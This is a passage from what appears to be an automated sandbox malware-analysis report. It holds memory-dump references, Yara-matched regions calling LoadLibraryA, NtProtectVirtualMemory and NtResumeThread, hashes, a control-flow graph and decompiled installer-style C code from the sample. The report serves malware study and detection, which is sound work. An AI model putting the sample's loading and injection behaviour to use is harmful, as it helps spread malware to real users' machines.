                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateInstance
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                                        • API String ID: 542301482-670666241
                                                                                        • Opcode ID: c4fc3fa67b876c583326420a1baafc892d445f4eb77b454d3c92970a980d6818
                                                                                        • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                                                                        • Opcode Fuzzy Hash: c4fc3fa67b876c583326420a1baafc892d445f4eb77b454d3c92970a980d6818
                                                                                        • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00406873(WCHAR* _a4) {
                                                                                        				void* _t2;
                                                                                        
                                                                                        				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
                                                                                        				if(_t2 == 0xffffffff) {
                                                                                        					return 0;
                                                                                        				}
                                                                                        				FindClose(_t2); // executed
                                                                                        				return 0x4302b8;
                                                                                        			}




                                                                                        0x0040687e
                                                                                        0x00406887
                                                                                        0x00000000
                                                                                        0x00406894
                                                                                        0x0040688a
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • FindFirstFileW.KERNELBASE(?,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 4Gw,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,77473420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                                                        • FindClose.KERNELBASE(00000000), ref: 0040688A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileFirst
                                                                                        • String ID:
                                                                                        • API String ID: 2295610775-0
                                                                                        • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                        • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                                                        • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                        • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213833253823.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2a40000_SecuriteInfo.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1e4c9ab49b71475cc2bad8885e91b0d3c1feec4b95deb0252a8a3f599b71dda7
                                                                                        • Instruction ID: 0312c47c7524d81795d30e0c2f83f3b8d5c895a9d984d7f4fba10564441652bb
                                                                                        • Opcode Fuzzy Hash: 1e4c9ab49b71475cc2bad8885e91b0d3c1feec4b95deb0252a8a3f599b71dda7
                                                                                        • Instruction Fuzzy Hash: 9A22F450409BE756DB31EFB858847EF3B920E47870F684BC9DDB0AA1E3DB2191C5C262
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(68172F4F), ref: 02A5590D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213833253823.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2a40000_SecuriteInfo.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 7861d72980d3b34defc1121beea00ca075c7ea7228d1c22cf3edbee43ded7c8a
                                                                                        • Instruction ID: cfcfcacc3e50d749bfefb3ffaeb1a962865d77e1c4ce8b33ae03cac6163ceab3
                                                                                        • Opcode Fuzzy Hash: 7861d72980d3b34defc1121beea00ca075c7ea7228d1c22cf3edbee43ded7c8a
                                                                                        • Instruction Fuzzy Hash: 7F919A72A40355DFCF309E28CD987DB37A3AF96760F95811EDC899B204DB358A82CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(68172F4F), ref: 02A5590D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213833253823.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2a40000_SecuriteInfo.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: f6a8a9cd50073ee704561a767cff4ac7c2228f542fc1efbd70ea35c0b256188a
                                                                                        • Instruction ID: d3fbfe628d67ca9c17ced24723479540492582c854f1c71b70ca77f8450660eb
                                                                                        • Opcode Fuzzy Hash: f6a8a9cd50073ee704561a767cff4ac7c2228f542fc1efbd70ea35c0b256188a
                                                                                        • Instruction Fuzzy Hash: 35712671A00359DFCF346E68DDA87DF37A7AF953A0F944129DC898B240DB344A86CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(68172F4F), ref: 02A5590D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213833253823.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2a40000_SecuriteInfo.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: c12300aad2b54ae951e946eae95439bcf11a9c9c5362c5402237877efa503c7b
                                                                                        • Instruction ID: 35b1ea6e1eda640a61f8274eac61c7814f27b1b11c45444fe95faf0d67f95d80
                                                                                        • Opcode Fuzzy Hash: c12300aad2b54ae951e946eae95439bcf11a9c9c5362c5402237877efa503c7b
                                                                                        • Instruction Fuzzy Hash: BE5156B1A00358DFCB349F28CAD87DA37A6AF56320F94415ADC4A8B252CB318946CF51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • NtResumeThread.NTDLL(00000001,02A59A99), ref: 02A59548
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213833253823.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2a40000_SecuriteInfo.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: a45a0dfd6a3041176a5f368e74e2f179b865a20852dc6a2f21afd2eede5d7a2e
                                                                                        • Instruction ID: 703f3617ef9d5092169a37ef896c74516727fc3b0b650ddefea755941345fc04
                                                                                        • Opcode Fuzzy Hash: a45a0dfd6a3041176a5f368e74e2f179b865a20852dc6a2f21afd2eede5d7a2e
                                                                                        • Instruction Fuzzy Hash: 3C116171248367CFCF249E2499E43EF3772AB96394F90412ACD8B8F604DB305989C585
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • NtProtectVirtualMemory.NTDLL ref: 02A58BCD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213833253823.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2a40000_SecuriteInfo.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MemoryProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2706961497-0
                                                                                        • Opcode ID: fe8a894238802d0db67606bd9f5ea0d71a51b9650b56e6aec9f200db25ae0533
                                                                                        • Instruction ID: 233ce65232ef05fef3b940648daba236ffa22b1eeb06c9af68a026e400bb51ed
                                                                                        • Opcode Fuzzy Hash: fe8a894238802d0db67606bd9f5ea0d71a51b9650b56e6aec9f200db25ae0533
                                                                                        • Instruction Fuzzy Hash: 090119B13046959FDB64CE28CC85BEEB7EAEBD8351F448519ED899B301D7309A40CB16
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213833253823.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2a40000_SecuriteInfo.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3bbfffd55c26b7ee30ad54de1b4d7ce5f695d2e903b7f664b3ca5fb8a4bab317
                                                                                        • Instruction ID: aa90d591a4d4691c96ccc82b0a77f6cb047755487e79f326de8136350086b368
                                                                                        • Opcode Fuzzy Hash: 3bbfffd55c26b7ee30ad54de1b4d7ce5f695d2e903b7f664b3ca5fb8a4bab317
                                                                                        • Instruction Fuzzy Hash: 22D156608097868BCB268F7988952EC7FA15E83670B384BCDD5B45F6F3CF518186C792
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 194 403f9a-403fac 195 403fb2-403fb8 194->195 196 404113-404122 194->196 195->196 197 403fbe-403fc7 195->197 198 404171-404186 196->198 199 404124-40416c GetDlgItem * 2 call 404499 SetClassLongW call 40140b 196->199 203 403fc9-403fd6 SetWindowPos 197->203 204 403fdc-403fe3 197->204 201 4041c6-4041cb call 4044e5 198->201 202 404188-40418b 198->202 199->198 216 4041d0-4041eb 201->216 206 40418d-404198 call 401389 202->206 207 4041be-4041c0 202->207 203->204 209 403fe5-403fff ShowWindow 204->209 210 404027-40402d 204->210 206->207 233 40419a-4041b9 SendMessageW 206->233 207->201 215 404466 207->215 217 404100-40410e call 404500 209->217 218 404005-404018 GetWindowLongW 209->218 212 404046-404049 210->212 213 40402f-404041 DestroyWindow 210->213 223 40404b-404057 SetWindowLongW 212->223 224 40405c-404062 212->224 221 404443-404449 213->221 222 404468-40446f 215->222 227 4041f4-4041fa 216->227 228 4041ed-4041ef call 40140b 216->228 217->222 218->217 219 40401e-404021 ShowWindow 218->219 219->210 221->215 229 40444b-404451 221->229 223->222 224->217 232 404068-404077 GetDlgItem 224->232 230 404200-40420b 227->230 231 404424-40443d DestroyWindow EndDialog 227->231 228->227 229->215 236 404453-40445c ShowWindow 229->236 230->231 237 404211-40425e call 40657a call 404499 * 3 GetDlgItem 230->237 231->221 238 404096-404099 232->238 239 404079-404090 SendMessageW IsWindowEnabled 232->239 233->222 236->215 266 404260-404265 237->266 267 404268-4042a4 ShowWindow KiUserCallbackDispatcher call 4044bb EnableWindow 237->267 241 40409b-40409c 238->241 242 40409e-4040a1 238->242 239->215 239->238 244 4040cc-4040d1 call 404472 241->244 245 4040a3-4040a9 242->245 246 4040af-4040b4 242->246 244->217 249 4040ea-4040fa SendMessageW 245->249 250 4040ab-4040ad 245->250 246->249 251 4040b6-4040bc 246->251 249->217 250->244 254 4040d3-4040dc call 40140b 251->254 255 4040be-4040c4 call 40140b 251->255 254->217 264 4040de-4040e8 254->264 262 4040ca 255->262 262->244 264->262 266->267 270 4042a6-4042a7 267->270 271 4042a9 267->271 272 4042ab-4042d9 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042db-4042ec SendMessageW 272->273 274 4042ee 272->274 275 4042f4-404333 call 4044ce call 403f7b call 40653d lstrlenW call 40657a SetWindowTextW call 401389 273->275 274->275 275->216 286 404339-40433b 275->286 286->216 287 404341-404345 286->287 288 404364-404378 DestroyWindow 287->288 289 404347-40434d 287->289 288->221 291 40437e-4043ab CreateDialogParamW 288->291 289->215 290 404353-404359 289->290 290->216 292 40435f 290->292 291->221 293 4043b1-404408 call 404499 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->215 293->215 298 40440a-40441d ShowWindow call 4044e5 293->298 300 404422 298->300 300->221
                                                                                        C-Code - Quality: 84%
                                                                                        			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                                                        				struct HWND__* _v28;
                                                                                        				void* _v84;
                                                                                        				void* _v88;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				signed int _t34;
                                                                                        				signed int _t36;
                                                                                        				signed int _t38;
                                                                                        				struct HWND__* _t48;
                                                                                        				signed int _t67;
                                                                                        				struct HWND__* _t73;
                                                                                        				signed int _t86;
                                                                                        				struct HWND__* _t91;
                                                                                        				signed int _t99;
                                                                                        				int _t103;
                                                                                        				signed int _t117;
                                                                                        				int _t118;
                                                                                        				int _t122;
                                                                                        				signed int _t124;
                                                                                        				struct HWND__* _t127;
                                                                                        				struct HWND__* _t128;
                                                                                        				int _t129;
                                                                                        				intOrPtr _t130;
                                                                                        				long _t133;
                                                                                        				int _t135;
                                                                                        				int _t136;
                                                                                        				void* _t137;
                                                                                        				void* _t146;
                                                                                        
                                                                                        				_t130 = _a8;
                                                                                        				if(_t130 == 0x110 || _t130 == 0x408) {
                                                                                        					_t34 = _a12;
                                                                                        					_t127 = _a4;
                                                                                        					__eflags = _t130 - 0x110;
                                                                                        					 *0x42d250 = _t34;
                                                                                        					if(_t130 == 0x110) {
                                                                                        						 *0x434f08 = _t127;
                                                                                        						 *0x42d264 = GetDlgItem(_t127, 1);
                                                                                        						_t91 = GetDlgItem(_t127, 2);
                                                                                        						_push(0xffffffff);
                                                                                        						_push(0x1c);
                                                                                        						 *0x42b230 = _t91;
                                                                                        						E00404499(_t127);
                                                                                        						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
                                                                                        						 *0x433ecc = E0040140B(4);
                                                                                        						_t34 = 1;
                                                                                        						__eflags = 1;
                                                                                        						 *0x42d250 = 1;
                                                                                        					}
                                                                                        					_t124 =  *0x40a368; // 0x0
                                                                                        					_t136 = 0;
                                                                                        					_t133 = (_t124 << 6) +  *0x434f20;
                                                                                        					__eflags = _t124;
                                                                                        					if(_t124 < 0) {
                                                                                        						L36:
                                                                                        						E004044E5(0x40b);
                                                                                        						while(1) {
                                                                                        							_t36 =  *0x42d250;
                                                                                        							 *0x40a368 =  *0x40a368 + _t36;
                                                                                        							_t133 = _t133 + (_t36 << 6);
                                                                                        							_t38 =  *0x40a368; // 0x0
                                                                                        							__eflags = _t38 -  *0x434f24;
                                                                                        							if(_t38 ==  *0x434f24) {
                                                                                        								E0040140B(1);
                                                                                        							}
                                                                                        							__eflags =  *0x433ecc - _t136; // 0x0
                                                                                        							if(__eflags != 0) {
                                                                                        								break;
                                                                                        							}
                                                                                        							__eflags =  *0x40a368 -  *0x434f24; // 0x0
                                                                                        							if(__eflags >= 0) {
                                                                                        								break;
                                                                                        							}
                                                                                        							_t117 =  *(_t133 + 0x14);
                                                                                        							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
                                                                                        							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                                                        							_push(0xfffffc19);
                                                                                        							E00404499(_t127);
                                                                                        							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                                                        							_push(0xfffffc1b);
                                                                                        							E00404499(_t127);
                                                                                        							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                                                        							_push(0xfffffc1a);
                                                                                        							E00404499(_t127);
                                                                                        							_t48 = GetDlgItem(_t127, 3);
                                                                                        							__eflags =  *0x434f8c - _t136;
                                                                                        							_v28 = _t48;
                                                                                        							if( *0x434f8c != _t136) {
                                                                                        								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                                                        								__eflags = _t117;
                                                                                        							}
                                                                                        							ShowWindow(_t48, _t117 & 0x00000008); // executed
                                                                                        							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
                                                                                        							E004044BB(_t117 & 0x00000002);
                                                                                        							_t118 = _t117 & 0x00000004;
                                                                                        							EnableWindow( *0x42b230, _t118);
                                                                                        							__eflags = _t118 - _t136;
                                                                                        							if(_t118 == _t136) {
                                                                                        								_push(1);
                                                                                        							} else {
                                                                                        								_push(_t136);
                                                                                        							}
                                                                                        							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                                                        							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                                                        							__eflags =  *0x434f8c - _t136;
                                                                                        							if( *0x434f8c == _t136) {
                                                                                        								_push( *0x42d264);
                                                                                        							} else {
                                                                                        								SendMessageW(_t127, 0x401, 2, _t136);
                                                                                        								_push( *0x42b230);
                                                                                        							}
                                                                                        							E004044CE();
                                                                                        							E0040653D(0x42d268, E00403F7B());
                                                                                        							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                                                        							SetWindowTextW(_t127, 0x42d268); // executed
                                                                                        							_push(_t136);
                                                                                        							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                                                        							__eflags = _t67;
                                                                                        							if(_t67 != 0) {
                                                                                        								continue;
                                                                                        							} else {
                                                                                        								__eflags =  *_t133 - _t136;
                                                                                        								if( *_t133 == _t136) {
                                                                                        									continue;
                                                                                        								}
                                                                                        								__eflags =  *(_t133 + 4) - 5;
                                                                                        								if( *(_t133 + 4) != 5) {
                                                                                        									DestroyWindow( *0x433ed8); // executed
                                                                                        									 *0x42c240 = _t133;
                                                                                        									__eflags =  *_t133 - _t136;
                                                                                        									if( *_t133 <= _t136) {
                                                                                        										goto L60;
                                                                                        									}
                                                                                        									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
                                                                                        									__eflags = _t73 - _t136;
                                                                                        									 *0x433ed8 = _t73;
                                                                                        									if(_t73 == _t136) {
                                                                                        										goto L60;
                                                                                        									}
                                                                                        									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                                                        									_push(6);
                                                                                        									E00404499(_t73);
                                                                                        									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                                                        									ScreenToClient(_t127, _t137 + 0x10);
                                                                                        									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                                                        									_push(_t136);
                                                                                        									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                                                        									__eflags =  *0x433ecc - _t136; // 0x0
                                                                                        									if(__eflags != 0) {
                                                                                        										goto L63;
                                                                                        									}
                                                                                        									ShowWindow( *0x433ed8, 8); // executed
                                                                                        									E004044E5(0x405);
                                                                                        									goto L60;
                                                                                        								}
                                                                                        								__eflags =  *0x434f8c - _t136;
                                                                                        								if( *0x434f8c != _t136) {
                                                                                        									goto L63;
                                                                                        								}
                                                                                        								__eflags =  *0x434f80 - _t136;
                                                                                        								if( *0x434f80 != _t136) {
                                                                                        									continue;
                                                                                        								}
                                                                                        								goto L63;
                                                                                        							}
                                                                                        						}
                                                                                        						DestroyWindow( *0x433ed8);
                                                                                        						 *0x434f08 = _t136;
                                                                                        						EndDialog(_t127,  *0x42ba38);
                                                                                        						goto L60;
                                                                                        					} else {
                                                                                        						__eflags = _t34 - 1;
                                                                                        						if(_t34 != 1) {
                                                                                        							L35:
                                                                                        							__eflags =  *_t133 - _t136;
                                                                                        							if( *_t133 == _t136) {
                                                                                        								goto L63;
                                                                                        							}
                                                                                        							goto L36;
                                                                                        						}
                                                                                        						_push(0);
                                                                                        						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                                                        						__eflags = _t86;
                                                                                        						if(_t86 == 0) {
                                                                                        							goto L35;
                                                                                        						}
                                                                                        						SendMessageW( *0x433ed8, 0x40f, 0, 1);
                                                                                        						__eflags =  *0x433ecc - _t136; // 0x0
                                                                                        						return 0 | __eflags == 0x00000000;
                                                                                        					}
                                                                                        				} else {
                                                                                        					_t127 = _a4;
                                                                                        					_t136 = 0;
                                                                                        					if(_t130 == 0x47) {
                                                                                        						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
                                                                                        					}
                                                                                        					_t122 = _a12;
                                                                                        					if(_t130 != 5) {
                                                                                        						L8:
                                                                                        						if(_t130 != 0x40d) {
                                                                                        							__eflags = _t130 - 0x11;
                                                                                        							if(_t130 != 0x11) {
                                                                                        								__eflags = _t130 - 0x111;
                                                                                        								if(_t130 != 0x111) {
                                                                                        									L28:
                                                                                        									return E00404500(_a8, _t122, _a16);
                                                                                        								}
                                                                                        								_t135 = _t122 & 0x0000ffff;
                                                                                        								_t128 = GetDlgItem(_t127, _t135);
                                                                                        								__eflags = _t128 - _t136;
                                                                                        								if(_t128 == _t136) {
                                                                                        									L15:
                                                                                        									__eflags = _t135 - 1;
                                                                                        									if(_t135 != 1) {
                                                                                        										__eflags = _t135 - 3;
                                                                                        										if(_t135 != 3) {
                                                                                        											_t129 = 2;
                                                                                        											__eflags = _t135 - _t129;
                                                                                        											if(_t135 != _t129) {
                                                                                        												L27:
                                                                                        												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
                                                                                        												goto L28;
                                                                                        											}
                                                                                        											__eflags =  *0x434f8c - _t136;
                                                                                        											if( *0x434f8c == _t136) {
                                                                                        												_t99 = E0040140B(3);
                                                                                        												__eflags = _t99;
                                                                                        												if(_t99 != 0) {
                                                                                        													goto L28;
                                                                                        												}
                                                                                        												 *0x42ba38 = 1;
                                                                                        												L23:
                                                                                        												_push(0x78);
                                                                                        												L24:
                                                                                        												E00404472();
                                                                                        												goto L28;
                                                                                        											}
                                                                                        											E0040140B(_t129);
                                                                                        											 *0x42ba38 = _t129;
                                                                                        											goto L23;
                                                                                        										}
                                                                                        										__eflags =  *0x40a368 - _t136; // 0x0
                                                                                        										if(__eflags <= 0) {
                                                                                        											goto L27;
                                                                                        										}
                                                                                        										_push(0xffffffff);
                                                                                        										goto L24;
                                                                                        									}
                                                                                        									_push(_t135);
                                                                                        									goto L24;
                                                                                        								}
                                                                                        								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                                                        								_t103 = IsWindowEnabled(_t128);
                                                                                        								__eflags = _t103;
                                                                                        								if(_t103 == 0) {
                                                                                        									L63:
                                                                                        									return 0;
                                                                                        								}
                                                                                        								goto L15;
                                                                                        							}
                                                                                        							SetWindowLongW(_t127, _t136, _t136);
                                                                                        							return 1;
                                                                                        						}
                                                                                        						DestroyWindow( *0x433ed8);
                                                                                        						 *0x433ed8 = _t122;
                                                                                        						L60:
                                                                                        						if( *0x42f268 == _t136) {
                                                                                        							_t146 =  *0x433ed8 - _t136; // 0x10432
                                                                                        							if(_t146 != 0) {
                                                                                        								ShowWindow(_t127, 0xa); // executed
                                                                                        								 *0x42f268 = 1;
                                                                                        							}
                                                                                        						}
                                                                                        						goto L63;
                                                                                        					}
                                                                                        					asm("sbb eax, eax");
                                                                                        					ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
                                                                                        					if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                                                        						goto L28;
                                                                                        					} else {
                                                                                        						ShowWindow(_t127, 4);
                                                                                        						goto L8;
                                                                                        					}
                                                                                        				}
                                                                                        			}
































                                                                                        0x00403fa5
                                                                                        0x00403fac
                                                                                        0x00404113
                                                                                        0x00404117
                                                                                        0x0040411b
                                                                                        0x0040411d
                                                                                        0x00404122
                                                                                        0x0040412d
                                                                                        0x00404138
                                                                                        0x0040413d
                                                                                        0x0040413f
                                                                                        0x00404141
                                                                                        0x00404144
                                                                                        0x00404149
                                                                                        0x00404157
                                                                                        0x00404164
                                                                                        0x0040416b
                                                                                        0x0040416b
                                                                                        0x0040416c
                                                                                        0x0040416c
                                                                                        0x00404171
                                                                                        0x00404177
                                                                                        0x0040417e
                                                                                        0x00404184
                                                                                        0x00404186
                                                                                        0x004041c6
                                                                                        0x004041cb
                                                                                        0x004041d0
                                                                                        0x004041d0
                                                                                        0x004041d5
                                                                                        0x004041de
                                                                                        0x004041e0
                                                                                        0x004041e5
                                                                                        0x004041eb
                                                                                        0x004041ef
                                                                                        0x004041ef
                                                                                        0x004041f4
                                                                                        0x004041fa
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404205
                                                                                        0x0040420b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404214
                                                                                        0x0040421c
                                                                                        0x00404221
                                                                                        0x00404224
                                                                                        0x0040422a
                                                                                        0x0040422f
                                                                                        0x00404232
                                                                                        0x00404238
                                                                                        0x0040423d
                                                                                        0x00404240
                                                                                        0x00404246
                                                                                        0x0040424e
                                                                                        0x00404254
                                                                                        0x0040425a
                                                                                        0x0040425e
                                                                                        0x00404265
                                                                                        0x00404265
                                                                                        0x00404265
                                                                                        0x0040426f
                                                                                        0x00404281
                                                                                        0x0040428d
                                                                                        0x00404292
                                                                                        0x0040429c
                                                                                        0x004042a2
                                                                                        0x004042a4
                                                                                        0x004042a9
                                                                                        0x004042a6
                                                                                        0x004042a6
                                                                                        0x004042a6
                                                                                        0x004042b9
                                                                                        0x004042d1
                                                                                        0x004042d3
                                                                                        0x004042d9
                                                                                        0x004042ee
                                                                                        0x004042db
                                                                                        0x004042e4
                                                                                        0x004042e6
                                                                                        0x004042e6
                                                                                        0x004042f4
                                                                                        0x00404305
                                                                                        0x0040431b
                                                                                        0x00404322
                                                                                        0x00404328
                                                                                        0x0040432c
                                                                                        0x00404331
                                                                                        0x00404333
                                                                                        0x00000000
                                                                                        0x00404339
                                                                                        0x00404339
                                                                                        0x0040433b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404341
                                                                                        0x00404345
                                                                                        0x0040436a
                                                                                        0x00404370
                                                                                        0x00404376
                                                                                        0x00404378
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040439e
                                                                                        0x004043a4
                                                                                        0x004043a6
                                                                                        0x004043ab
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004043b1
                                                                                        0x004043b4
                                                                                        0x004043b7
                                                                                        0x004043ce
                                                                                        0x004043da
                                                                                        0x004043f3
                                                                                        0x004043f9
                                                                                        0x004043fd
                                                                                        0x00404402
                                                                                        0x00404408
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404412
                                                                                        0x0040441d
                                                                                        0x00000000
                                                                                        0x0040441d
                                                                                        0x00404347
                                                                                        0x0040434d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404353
                                                                                        0x00404359
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040435f
                                                                                        0x00404333
                                                                                        0x0040442a
                                                                                        0x00404436
                                                                                        0x0040443d
                                                                                        0x00000000
                                                                                        0x00404188
                                                                                        0x00404188
                                                                                        0x0040418b
                                                                                        0x004041be
                                                                                        0x004041be
                                                                                        0x004041c0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004041c0
                                                                                        0x0040418d
                                                                                        0x00404191
                                                                                        0x00404196
                                                                                        0x00404198
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004041a8
                                                                                        0x004041b0
                                                                                        0x00000000
                                                                                        0x004041b6
                                                                                        0x00403fbe
                                                                                        0x00403fbe
                                                                                        0x00403fc2
                                                                                        0x00403fc7
                                                                                        0x00403fd6
